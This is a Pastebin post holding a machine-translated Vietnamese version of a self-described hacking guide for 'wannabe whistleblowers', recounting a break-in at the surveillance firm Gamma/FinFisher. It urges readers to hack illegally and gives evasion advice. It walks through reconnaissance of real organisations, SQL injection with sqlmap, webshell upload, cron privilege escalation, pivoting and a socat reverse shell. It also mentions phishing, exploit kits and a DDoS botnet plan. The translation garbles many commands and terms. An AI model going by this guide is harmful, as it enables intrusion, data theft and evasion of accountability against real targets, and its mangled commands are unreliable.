Advertisement
onglaobanca

sổ tay

Jun 8th, 2017
705
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.23 KB | None | 0 0
  1. _ _ _ ____ _ _
  2. | | | | __ ___ _ | | __ | __) __ _ ___ | | _ | |
  3. | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  4. | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  5. | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
  6.  
  7. Hướng dẫn tự làm cho những người không đủ kiên nhẫn để chờ đợi cho người tố cáo
  8.  
  9.  
  10. - [1] - Giới thiệu
  11.  
  12. Tôi không viết bài này để khoe khoang về những gì tôi có 31.337 h4x0r và những gì m4d sk1llz
  13. nó đã 0wn Gamma. Tôi viết thư này để làm sáng tỏ hacking, để hiển thị như thế nào đơn giản
  14. đó là, và để hy vọng thông tin và truyền cảm hứng cho bạn để đi ra ngoài và hack shit. Nếu bạn
  15. không có kinh nghiệm với lập trình hay hack, một số văn bản dưới sức
  16. trông giống như một ngoại ngữ. Kiểm tra phần tài nguyên ở cuối để giúp bạn
  17. bắt đầu. Và tôi tin tưởng, một khi bạn đã học được những điều cơ bản bạn sẽ nhận ra điều này
  18. thực sự là dễ dàng hơn nộp đơn yêu cầu FOIA.
  19.  
  20.  
  21. - [2] - Giữ an toàn
  22.  
  23. Điều này là bất hợp pháp, vì vậy bạn sẽ cần phải có biện pháp phòng ngừa cơ bản:
  24.  
  25. 1) Thực hiện một khối lượng mã hóa ẩn với TrueCrypt 7.1a [0]
  26. 2) Bên trong khối lượng mã hóa cài đặt Whonix [1]
  27. 3) (bắt buộc) Trong khi chỉ có tất cả mọi thứ đi qua Tor nhờ Whonix là
  28. có lẽ là đủ, nó tốt hơn để không sử dụng một kết nối internet kết nối
  29. tên hoặc địa chỉ của bạn. Một cantenna, aircrack, và Reaver có thể có ích
  30. ở đây.
  31.  
  32. [0] https://truecrypt.ch/downloads/
  33. [1] https://www.whonix.org/wiki/Download#Install_Whonix
  34.  
  35. Miễn là bạn theo nghĩa thông thường như không bao giờ làm bất cứ điều gì liên quan hack
  36. ngoài Whonix, không bao giờ làm bất cứ việc sử dụng máy tính bình thường của bạn bên trong Whonix,
  37. không bao giờ đề cập đến bất kỳ thông tin về cuộc sống thực của bạn khi nói chuyện với khác
  38. tin tặc, và không bao giờ khoe khoang về khai thác bất hợp pháp hacking của bạn để bạn bè trong thời gian thực
  39. cuộc sống, sau đó bạn có khá nhiều có thể làm bất cứ điều gì bạn muốn mà không sợ bị v &.
  40.  
  41. Chú ý: Tôi không khuyên thực sự hack trực tiếp trên Tor. Trong khi Tor là có thể sử dụng
  42. đối với một số thứ như trình duyệt web, khi nói đến việc sử dụng công cụ hack như
  43. nmap, sqlmap, và Nikto rằng đang làm cho hàng ngàn yêu cầu, họ sẽ chạy
  44. rất chậm hơn Tor. Chưa kể rằng bạn sẽ muốn có một địa chỉ IP công cộng
  45. nhận được kết nối trở lại vỏ. Tôi khuyên bạn nên sử dụng máy chủ bạn đã bị tấn công hoặc một VPS
  46. thanh toán bằng Bitcoin để hack từ. Bằng cách đó chỉ có giao diện văn bản băng thông thấp
  47. giữa bạn và máy chủ kết thúc Tor. Tất cả các lệnh bạn đang chạy sẽ
  48. phải mục tiêu của bạn một kết nối nhanh chóng tốt đẹp.
  49.  
  50.  
  51. - [3] - Lập bản đồ ra các mục tiêu
  52.  
  53. Về cơ bản tôi chỉ cần liên tục sử dụng khốc liệt [0], tra cứu whois trên địa chỉ IP và
  54. tên miền, và tra cứu whois ngược lại để tìm tất cả không gian địa chỉ IP và tên miền
  55. tên gắn liền với một tổ chức.
  56.  
  57. [0] http://ha.ckers.org/fierce/
  58.  
  59. Đối với một ví dụ, chúng ta hãy Blackwater. Chúng tôi bắt đầu biết trang chủ là
  60. academi.com. Chạy fierce.pl -dns academi.com chúng ta tìm thấy các tên miền phụ:
  61. 67.238.84.228 email.academi.com
  62. 67.238.84.242 extranet.academi.com
  63. 67.238.84.240 mail.academi.com
  64. 67.238.84.230 secure.academi.com
  65. 67.238.84.227 vault.academi.com
  66. 54.243.51.249 www.academi.com
  67.  
  68. Bây giờ chúng ta làm tra cứu whois và tìm thấy những trang chủ của www.academi.com được lưu trữ trên
  69. Amazon Web Service, trong khi các khu công nghiệp khác trong phạm vi:
  70. NetRange: 67.238.84.224 - 67.238.84.255
  71. CIDR: 67.238.84.224/27
  72. CustName: Blackwater USA
  73. Địa chỉ: 850 Puddin Ridge Rd
  74.  
  75. Làm một tra cứu whois trên academi.com cho thấy nó cũng đăng ký cùng
  76. địa chỉ, vì vậy chúng tôi sẽ sử dụng như là một chuỗi tìm kiếm với cho whois ngược
  77. tra cứu. Theo như tôi biết tất cả các đảo ngược whois chi phí dịch vụ tra cứu thực tế
  78. tiền bạc, vì vậy tôi chỉ lừa với google:
  79. "850 Puddin Ridge Rd" inurl: địa chỉ IP-tra cứu
  80. "850 Puddin Ridge Rd" inurl: domaintools
  81.  
  82. Bây giờ chạy -range fierce.pl trên dãy IP bạn tìm thấy để tra cứu tên dns, và
  83. fierce.pl -dns trên các tên miền để tìm các tên miền phụ và địa chỉ IP. Làm nhiều hơn nữa
  84. tra cứu whois và lặp lại quá trình này cho đến khi bạn đã tìm thấy tất cả mọi thứ.
  85.  
  86. Ngoài ra chỉ cần google tổ chức và duyệt xung quanh trang web của mình. Ví dụ trên
  87. academi.com chúng tôi tìm thấy các liên kết đến một cổng thông tin nghề nghiệp, một cửa hàng trực tuyến, và một nhân viên
  88. trang tài nguyên, vì vậy bây giờ chúng tôi có một số chi tiết:
  89. 54.236.143.203 careers.academi.com
  90. 67.132.195.12 academiproshop.com
  91. 67.238.84.236 te.academi.com
  92. 67.238.84.238 property.academi.com
  93. 67.238.84.241 teams.academi.com
  94.  
  95. Nếu bạn lặp lại tra cứu whois và như vậy bạn sẽ thấy dường như academiproshop.com
  96. không được tổ chức hoặc được duy trì bởi Blackwater, do gãi đó ra khỏi danh sách
  97. khu công nghiệp thú vị / lĩnh vực.
  98.  
  99. Trong trường hợp của FinFisher những gì đã dẫn tôi đến dễ bị tổn thương finsupport.finfisher.com
  100. chỉ đơn giản là một domain của finfisher.com mà tìm thấy nó đăng ký tên
  101. "FinFisher GmbH". Google:
  102. "FinFisher GmbH" inurl: domaintools
  103. tìm thấy gamma-international.de, mà chuyển hướng đến finsupport.finfisher.com
  104.  
  105. ... Vì vậy bây giờ bạn đã có một số ý tưởng làm thế nào tôi vạch ra một mục tiêu.
  106. Điều này thực sự là một trong những phần quan trọng nhất, là cuộc tấn công lớn hơn
  107. bề mặt mà bạn có thể vạch ra, dễ dàng hơn nó sẽ được để tìm thấy một lỗ
  108. ở đâu đó trong nó.
  109.  
  110.  
  111. - [4] - Quét & Khai thác
  112.  
  113. Quét tất cả các dãy IP mà bạn tìm thấy với nmap để tìm tất cả các dịch vụ đang chạy. Ngoài
  114. từ một cổng quét chuẩn, quét SNMP là bị đánh giá thấp.
  115.  
  116. Bây giờ cho mỗi dịch vụ mà bạn tìm thấy đang chạy:
  117.  
  118. 1) Có phải phơi bày một cái gì đó nó không nên? Đôi khi các công ty sẽ có các dịch vụ
  119. chạy mà không yêu cầu xác thực và chỉ cho rằng đó là an toàn vì url
  120. hoặc IP để truy cập nó không phải là công cộng. Có lẽ quyết liệt tìm thấy một git tên miền phụ và bạn có thể
  121. đi đến git.companyname.come / gitweb / và duyệt mã nguồn của họ.
  122.  
  123. 2) Có phải khủng khiếp sai? Có thể họ có một máy chủ FTP cho phép
  124. vô danh đọc hoặc viết truy cập vào một thư mục quan trọng. Có thể họ có một
  125. máy chủ cơ sở dữ liệu với một mật khẩu quản trị trống (lol Stratfor). Có thể nhúng
  126. thiết bị (hộp VOIP, IP Camera, thiết bị định tuyến vv) đang sử dụng của nhà sản xuất
  127. mật khẩu mặc định.
  128.  
  129. 3) là nó chạy một phiên bản cũ của phần mềm dễ bị tổn thương đến một công khai thác?
  130.  
  131.  
  132. Máy chủ web xứng đáng với thể loại của mình. Đối với bất kỳ máy chủ web, bao gồm cả những nmap
  133. thường sẽ tìm thấy đang chạy trên cổng không chuẩn, tôi thường:
  134.  
  135. 1) Duyệt chúng. Đặc biệt là trên các tên miền phụ mà phát hiện khốc liệt mà không có mục đích
  136. cho công chúng xem như test.company.com hoặc dev.company.com bạn thường sẽ tìm thấy
  137. thứ thú vị khác chỉ bằng cách nhìn vào họ.
  138.  
  139. 2) Run Nikto [0]. Điều này sẽ kiểm tra những thứ như máy chủ web / svn /,
  140. máy chủ web / sao lưu /, máy chủ web / phpinfo.php, và phổ biến một vài ngàn khác
  141. sai lầm và cấu hình sai.
  142.  
  143. 3) Xác định các phần mềm đang được sử dụng trên trang web. WhatWeb rất hữu ích [1]
  144.  
  145. 4) Tùy thuộc vào phần mềm trang web đang hoạt động, sử dụng các công cụ cụ thể hơn
  146. như wpscan [2], [3] CMS-Explorer, và Joomscan [4].
  147.  
  148. Trước tiên hãy thử mà đối với tất cả các dịch vụ để xem nếu có có sai,
  149. công chúng biết đến tổn thương, hoặc cách khác dễ dàng. Nếu không, đó là thời gian để di chuyển
  150. vào việc tìm kiếm một lỗ hổng mới:
  151.  
  152. 5) các ứng dụng web được mã hóa tùy chỉnh là mảnh đất màu mỡ hơn cho lỗi lớn hơn so với sử dụng rộng rãi
  153. các dự án, vì vậy hãy thử những người đầu tiên. Tôi sử dụng ZAP [5], và một số sự kết hợp của nó
  154. kiểm tra tự động cùng với tay chĩa ra xung quanh với sự giúp đỡ của nó
  155. chặn proxy.
  156.  
  157. 6) Đối với phần mềm không tùy chỉnh họ đang chạy, có được một bản sao để xem xét. Nếu đó là
  158. phần mềm miễn phí bạn chỉ có thể tải về nó. Nếu đó là bạn có thể sở hữu thường
  159. cướp nó. Nếu đó là độc quyền và đủ tối nghĩa rằng bạn không thể cướp nó, bạn
  160. có thể mua nó (lame) hoặc tìm các trang web khác đang chạy cùng một phần mềm sử dụng google,
  161. tìm thấy một trong đó là dễ dàng hơn để hack, và nhận được một bản sao từ họ.
  162.  
  163. [0] http://www.cirt.net/nikto2
  164. [1] http://www.morningstarsecurity.com/research/whatweb
  165. [2] http://wpscan.org/
  166. [3] https://code.google.com/p/cms-explorer/
  167. [4] http://sourceforge.net/projects/joomscan/
  168. [5] https://code.google.com/p/zaproxy/
  169.  
  170.  
  171. Đối với finsupport.finfisher.com quá trình này:
  172.  
  173. * Bắt đầu Nikto chạy ở chế độ nền.
  174.  
  175. * Truy cập vào trang web. Xem gì, nhưng một trang đăng nhập. Nhanh chóng kiểm tra sqli trong
  176. mẫu đăng nhập.
  177.  
  178. * Xem nếu WhatWeb biết bất cứ điều gì về những phần mềm trang web đang chạy.
  179.  
  180. * WhatWeb không nhận ra nó, vì vậy câu hỏi tiếp theo, tôi muốn được trả lời là nếu điều này
  181. là một trang web tùy chỉnh bằng Gamma, hoặc nếu có những trang web khác sử dụng cùng
  182. phần mềm.
  183.  
  184. * Tôi xem mã nguồn trang web để tìm một URL tôi có thể tìm kiếm trên (không phải là index.php
  185. chính xác duy nhất cho phần mềm này). Tôi chọn Scripts / scripts.js.php, và google:
  186. allinurl: "Scripts / scripts.js.php"
  187.  
  188. * Tôi thấy có một số ít các trang web khác sử dụng cùng một phần mềm, tất cả đều được mã hóa bởi
  189. cùng công ty webdesign nhỏ. Có vẻ như mỗi trang web được mã hóa tùy chỉnh nhưng
  190. họ chia sẻ rất nhiều mã. Vì vậy, tôi hack một vài trong số họ để có được một bộ sưu tập
  191. mã được viết bởi các công ty webdesign.
  192.  
  193. Tại thời điểm này tôi có thể thấy các câu chuyện tin tức rằng các nhà báo sẽ viết để trống
  194. lên quan điểm: "Trong một cuộc tấn công nhiều bước phức tạp, tin tặc đầu tiên thỏa hiệp một
  195. công ty thiết kế web để có được dữ liệu bí mật mà có thể hỗ trợ họ trong
  196. Nhóm tấn công Gamma ... "
  197.  
  198. Nhưng nó thực sự khá dễ dàng, thực hiện hầu như trên máy lái tự động khi bạn nhận được hang của
  199. nó. Phải mất tất cả của một vài phút để:
  200.  
  201. * Google allinurl: "Scripts / scripts.js.php" và tìm các trang web khác
  202.  
  203. * Chú ý tất cả họ đang tiêm sql trong tham số url đầu tiên tôi cố gắng.
  204.  
  205. * Nhận ra họ đang chạy Apache ModSecurity vì vậy tôi cần phải sử dụng sqlmap [0] với
  206. tùy chọn --tamper = 'giả mạo / modsecurityversioned.py'
  207.  
  208. * Có được các thông tin đăng nhập quản trị, đăng nhập và tải lên một vỏ php [1] (các
  209. kiểm tra phần mở rộng tập tin cho phép được thực hiện phía khách hàng trong javascript), và
  210. tải về mã nguồn của trang web.
  211.  
  212. [0] http://sqlmap.org/
  213. [1] https://epinna.github.io/Weevely/
  214.  
  215. Nhìn qua các mã nguồn mà họ cũng có thể đặt tên cho nó chết tiệt dễ bị tổn thương
  216. Web App v2 [0]. Nó có sqli, LFI, kiểm tra tập tin tải lên được thực hiện phía khách hàng trong
  217. javascript, và nếu bạn không được thẩm định trang quản trị chỉ gửi cho bạn trở lại
  218. trang đăng nhập với một tiêu đề Vị trí, nhưng bạn có thể ủy quyền ngăn chặn của bạn
  219. lọc các tiêu đề từ ra ngoài và truy cập nó tốt.
  220.  
  221. [0] http://www.dvwa.co.uk/
  222.  
  223. Quay trở lại trên các trang web finsupport, lợi nhuận admin / BackOffice / trang
  224. 403 Forbidden, và tôi đang gặp một số vấn đề với LFI, vì vậy tôi chuyển sang sử dụng các
  225. sqli (đó là tốt đẹp để có một chục tùy chọn để lựa chọn). Các trang web khác do
  226. nhà thiết kế web đều có một print.php tiêm, vì vậy một số yêu cầu nhanh chóng:
  227. https://finsupport.finfisher.com/GGI/Home/print.php?id=1 và 1 = 1
  228. https://finsupport.finfisher.com/GGI/Home/print.php?id=1 và 2 = 1
  229. tiết lộ rằng finsupport cũng đã print.php và nó là tiêm. Và đó là
  230. cơ sở dữ liệu quản trị! Đối với MySQL này có nghĩa là bạn có thể đọc và ghi các file. Hóa ra
  231. trang web đã magicquotes kích hoạt, vì vậy tôi không thể sử dụng INTO OUTFILE để ghi tập tin.
  232. Nhưng tôi có thể sử dụng một kịch bản ngắn có sử dụng sqlmap --file đọc để có được những nguồn php
  233. cho một URL, và một trang web yêu cầu bình thường để có được HTML, và sau đó tìm thấy tập tin
  234. bao gồm hoặc được yêu cầu trong nguồn php, và tìm kiếm các tập tin php liên kết trong HTML,
  235. đệ quy tải về mã nguồn cho toàn bộ trang web.
  236.  
  237. Nhìn qua các nguồn, tôi thấy khách hàng có thể đính kèm một tập tin để hỗ trợ họ
  238. vé, và không có kiểm tra trên phần mở rộng tập tin. Vì vậy, tôi chọn một tên người dùng và
  239. mật khẩu ra khỏi cơ sở dữ liệu khách hàng, tạo ra một yêu cầu hỗ trợ với một vỏ php
  240. đính kèm, và tôi đang ở trong!
  241.  
  242.  
  243. - [5] - (thất bại tại) Leo thang
  244.  
  245. ___________
  246. <Đã r00t? >
  247. -----------
  248. \ ^ __ ^
  249. \ (Oo) \ _______
  250. (__) \) \ / \
  251. || ---- W |
  252. || ||
  253. ^^^^^^^^^^^^^^^^
  254.  
  255. Gốc trên 50% các máy chủ Linux bạn gặp trong tự nhiên với hai kịch bản dễ dàng,
  256. [0] Linux_Exploit_Suggester, và Unix-privesc kiểm tra [1].
  257.  
  258. [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
  259. [1] https://code.google.com/p/unix-privesc-check/
  260.  
  261. finsupport được chạy phiên bản mới nhất của Debian với không có khai thác gốc địa phương,
  262. nhưng unix-privesc kiểm tra trả lại:
  263. Chú ý: /etc/cron.hourly/mgmtlicensestatus được điều hành bởi cron như là người chủ. Người sử dụng
  264. www-dữ liệu có thể viết thư cho /etc/cron.hourly/mgmtlicensestatus
  265. Chú ý: /etc/cron.hourly/webalizer được điều hành bởi cron như là người chủ. Người sử dụng www-data
  266. có thể viết thư cho /etc/cron.hourly/webalizer
  267.  
  268. vì vậy tôi thêm vào /etc/cron.hourly/webalizer:
  269. gốc chown: root / path / to / my_setuid_shell
  270. chmod 04.755 / path / to / my_setuid_shell
  271.  
  272. chờ đợi một giờ, và .... không có gì. Chỉ ra rằng trong khi quá trình cron đang chạy
  273. nó dường như không phải là thực sự chạy công việc cron. Nhìn vào Webalizer
  274. thư mục cho thấy nó không cập nhật các số liệu thống kê tháng trước. Rõ ràng sau khi
  275. cập nhật định kỳ múi giờ đôi khi sẽ chạy ở thời điểm sai lầm hoặc đôi khi không
  276. chạy ở tất cả và bạn cần phải khởi động lại cron sau khi thay đổi múi giờ. ls-l
  277. / Etc / localtime hiển thị múi giờ đã được cập nhật ngày 06 tháng 6, các Webalizer thời
  278. ngừng ghi số liệu thống kê, do đó có thể là vấn đề. Ở mức nào, chỉ
  279. Điều này không có gì là máy chủ lưu trữ các trang web, vì vậy tôi đã có thể truy cập
  280. tất cả mọi thứ thú vị trên nó. Gốc sẽ không nhận được nhiều bất cứ điều gì mới, vì vậy tôi di chuyển
  281. vào phần còn lại của mạng.
  282.  
  283.  
  284. - [6] - Xoay vòng
  285.  
  286. Bước tiếp theo là để nhìn xung quanh mạng nội bộ của hộp bạn bị tấn công. Điều này
  287. là khá nhiều giống như quét đầu tiên & Khai thác bước, ngoại trừ
  288. từ phía sau các bức tường lửa nhiều dịch vụ thú vị hơn sẽ được tiếp xúc. Một
  289. tarball chứa một bản sao liên kết tĩnh của nmap và tất cả các kịch bản của mình mà bạn
  290. có thể tải lên và chạy trên bất kỳ hộp là rất hữu ích cho việc này. * Các nfs- khác nhau và
  291. đặc biệt là smb- * kịch bản có nmap sẽ vô cùng hữu ích.
  292.  
  293. Điều thú vị duy nhất tôi có thể nhận được trên mạng nội bộ finsupport là một
  294. máy chủ web phục vụ lên một thư mục có tên 'qateam' có chứa phần mềm độc hại di động của họ.
  295.  
  296.  
  297. - [7] - Have Fun
  298.  
  299. Một khi bạn đang ở trong mạng lưới của họ, niềm vui thực sự bắt đầu. Chỉ cần sử dụng trí tưởng tượng của bạn.
  300. Trong khi tôi có tựa đề này hướng dẫn cho người tố cáo Wannabe, không có lý do để
  301. giới hạn mình để rò rỉ các tài liệu. Kế hoạch ban đầu của tôi là:
  302. 1) Hack Gamma và có được một bản sao của phần mềm máy chủ FinSpy
  303. 2) Tìm lỗ hổng trong máy chủ FinSpy.
  304. 3) Quét internet cho, và hack, tất cả các FinSpy C & C server.
  305. 4) Xác định các nhóm chạy chúng.
  306. 5) Sử dụng máy chủ C & C để tải lên và chạy một chương trình trên tất cả các mục tiêu nói với họ
  307. người đã làm gián điệp cho chúng.
  308. 6) Sử dụng máy chủ C & C để gỡ bỏ cài đặt FinFisher trên tất cả các mục tiêu.
  309. 7) Tham gia vào cựu C & C server vào một botnet để DDoS Gamma Group.
  310.  
  311. Đó là chỉ sau khi không để hack đầy đủ Gamma và kết thúc với một số
  312. tài liệu thú vị nhưng không có bản sao của phần mềm máy chủ FinSpy mà tôi đã phải
  313. thực hiện do có kế hoạch sao lưu lulzy ít rò rỉ công cụ của họ, trong khi
  314. chế giễu họ trên twitter.
  315. Điểm GPU của bạn tại FinSpy-PC + Điện thoại di động-2012-07-12-Final.zip và crack mật khẩu
  316. đã để tôi có thể chuyển sang bước 2!
  317.  
  318.  
  319. - [8] - Phương pháp khác
  320.  
  321. Phương pháp chung tôi nêu ở trên quét, tìm các lỗ hổng, và khai thác
  322. chỉ là một cách để hack, có lẽ phù hợp hơn với những người có một nền tảng trong
  323. lập trình. Không có một cách đúng đắn, và bất kỳ phương pháp làm việc tốt như
  324. bất kỳ khác. Các cách khác chính mà tôi sẽ nêu mà không đi vào chi tiết là:
  325.  
  326. 1) Khai thác trong browers web, java, flash, hoặc microsoft office, kết hợp với
  327. gửi email cho nhân viên với một thông điệp có sức thuyết phục để có được chúng để mở liên kết hoặc
  328. tập tin đính kèm, hoặc hack một trang web thường xuyên của các nhân viên và thêm các
  329. trình duyệt / java / flash khai thác đó.
  330. Đây là phương pháp được sử dụng bởi hầu hết các chính phủ nhóm hack, nhưng bạn không
  331. cần phải là một chính phủ với hàng triệu để chi tiêu cho nghiên cứu 0day hoặc đăng ký
  332. để FinSploit hoặc VUPEN để kéo nó đi. Bạn có thể có được một chất lượng Nga khai thác bộ
  333. cho một vài ngàn, và truy cập để thuê một cho ít hơn nhiều. Ngoài ra còn có
  334. Metasploit autopwn trình duyệt, nhưng có thể bạn sẽ có may mắn hơn không có
  335. khai thác và giả đèn flash cập nhật nhanh chóng.
  336.  
  337. 2) Lợi dụng thực tế mà mọi người là tốt đẹp, tin tưởng, và hữu ích 95%
  338. thời gian.
  339. Ngành công nghiệp infosec phát minh ra một thuật ngữ để làm âm thanh như một số loại
  340. khoa học: "Kỹ thuật Xã hội". Đây có lẽ là con đường để đi nếu bạn không biết
  341. quá nhiều về máy tính, và nó thực sự là tất cả những gì cần phải là một thành công
  342. Hacker [0].
  343.  
  344. [0] https://www.youtube.com/watch?v=DB6ywr9fngU
  345.  
  346.  
  347. - [9] - Tài nguyên
  348.  
  349. Liên kết:
  350.  
  351. * Https://www.pentesterlab.com/exercises/
  352. * Http://overthewire.org/wargames/
  353. * Http://www.hackthissite.org/
  354. * Http://smashthestack.org/
  355. * Http://www.win.tue.nl/~aeb/linux/hh/hh.html
  356. * Http://www.phrack.com/
  357. * Http://pen-testing.sans.org/blog/2012/04/26/got-Meterpreter-pivot
  358. * Http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
  359. * Https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
  360. * Https://www.netspi.com/blog/entryid/140/resources-cho-vọng thấm-xét nghiệm
  361. (Tất cả các bài đăng trên blog khác của ông là quá lớn)
  362. * Https://www.corelan.be/ (bắt đầu khai thác văn bản hướng dẫn phần 1)
  363. * Http://websec.wordpress.com/2010/02/22/exploiting-php-file-đưa-overview/
  364. Một mẹo nó lá ra là trên hầu hết các hệ thống bản ghi truy cập apache là
  365. có thể đọc được chỉ bởi root, nhưng bạn vẫn có thể bao gồm từ / proc / self / fd / 10
  366. bất cứ điều gì fd apache mở nó như là. Nó cũng sẽ hữu ích hơn nếu nó được đề cập
  367. những gì phiên bản của php các thủ đoạn khác nhau đã được cố định.
  368. * Http://www.dest-unreach.org/socat/
  369. Lấy vỏ ngược lại có thể sử dụng một bản sao liên kết tĩnh của socat để thả trên
  370. mục tiêu của bạn và:
  371. mục tiêu $ socat exec: 'bash -li, pty, stderr, setsid, SIGINT, lành mạnh tcp-nghe: portnum
  372. tổ chức $ socat file: `tty`, nguyên liệu, tiếng vang = 0 tcp kết nối: localhost: portnum
  373. Nó cũng hữu ích cho việc thiết lập trụ kỳ lạ và tất cả các loại công cụ khác.
  374.  
  375. Sách:
  376.  
  377. * Sổ tay Các ứng dụng Web của Hacker
  378. * Hacking: The Art of khai thác
  379. * Cơ sở dữ liệu Sổ tay Hacker của
  380. * Nghệ thuật Đánh giá phần mềm bảo mật
  381. * A Bug Diary Hunter
  382. * Ngầm: Tales of Hacking, điên rồ, và Obsession trên Electronic Frontier
  383. * TCP / IP Illustrated
  384.  
  385. Ngoài các công cụ hack cụ thể hầu như bất cứ điều gì hữu ích cho hệ thống
  386. quản trị để thiết lập và điều hành mạng cũng sẽ hữu ích cho
  387. khám phá chúng. Điều này bao gồm sự quen thuộc với các cửa sổ nhắc lệnh và Unix
  388. vỏ, kỹ năng kịch bản cơ bản, kiến ​​thức về LDAP, Kerberos, hoạt động thư mục,
  389. mạng, vv
  390.  
  391.  
  392. - [10] - Outro
  393.  
  394. Bạn sẽ nhận thấy một số âm thanh này chính xác như những gì Gamma đang làm. Hacking là một
  395. công cụ. Nó không bán các công cụ hack mà làm cho Gamma ác. Đó là người của họ
  396. khách hàng đang nhắm mục tiêu và với mục đích gì mà làm cho họ xấu xa. Đó không phải là
  397. để nói rằng công cụ này là vốn trung lập. Hacking là một công cụ tấn công. Trong
  398. cùng một cách mà chiến tranh du kích làm cho nó khó khăn hơn để chiếm một quốc gia, bất cứ khi nào
  399. nó rẻ hơn để tấn công hơn để bảo vệ nó khó hơn để duy trì bất hợp pháp
  400. quyền hạn và bất bình đẳng. Vì vậy, tôi đã viết này để cố gắng làm cho hacker dễ dàng hơn và nhiều hơn nữa
  401. truy cập. Và tôi muốn chỉ ra rằng Tập đoàn Gamma hack thực sự là không có gì
  402. ưa thích, sqli chỉ tiêu chuẩn, và rằng bạn không có khả năng đi ra ngoài và mất
  403. hành động tương tự.
  404.  
  405. Đoàn kết để tất cả mọi người ở Gaza, Israel-lương tâm chống đối, Chelsea
  406. Manning, Jeremy Hammond, Peter Sunde, anakata, và bỏ tù tất cả khác
  407. hacker, bất đồng chính kiến, và tội phạm!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement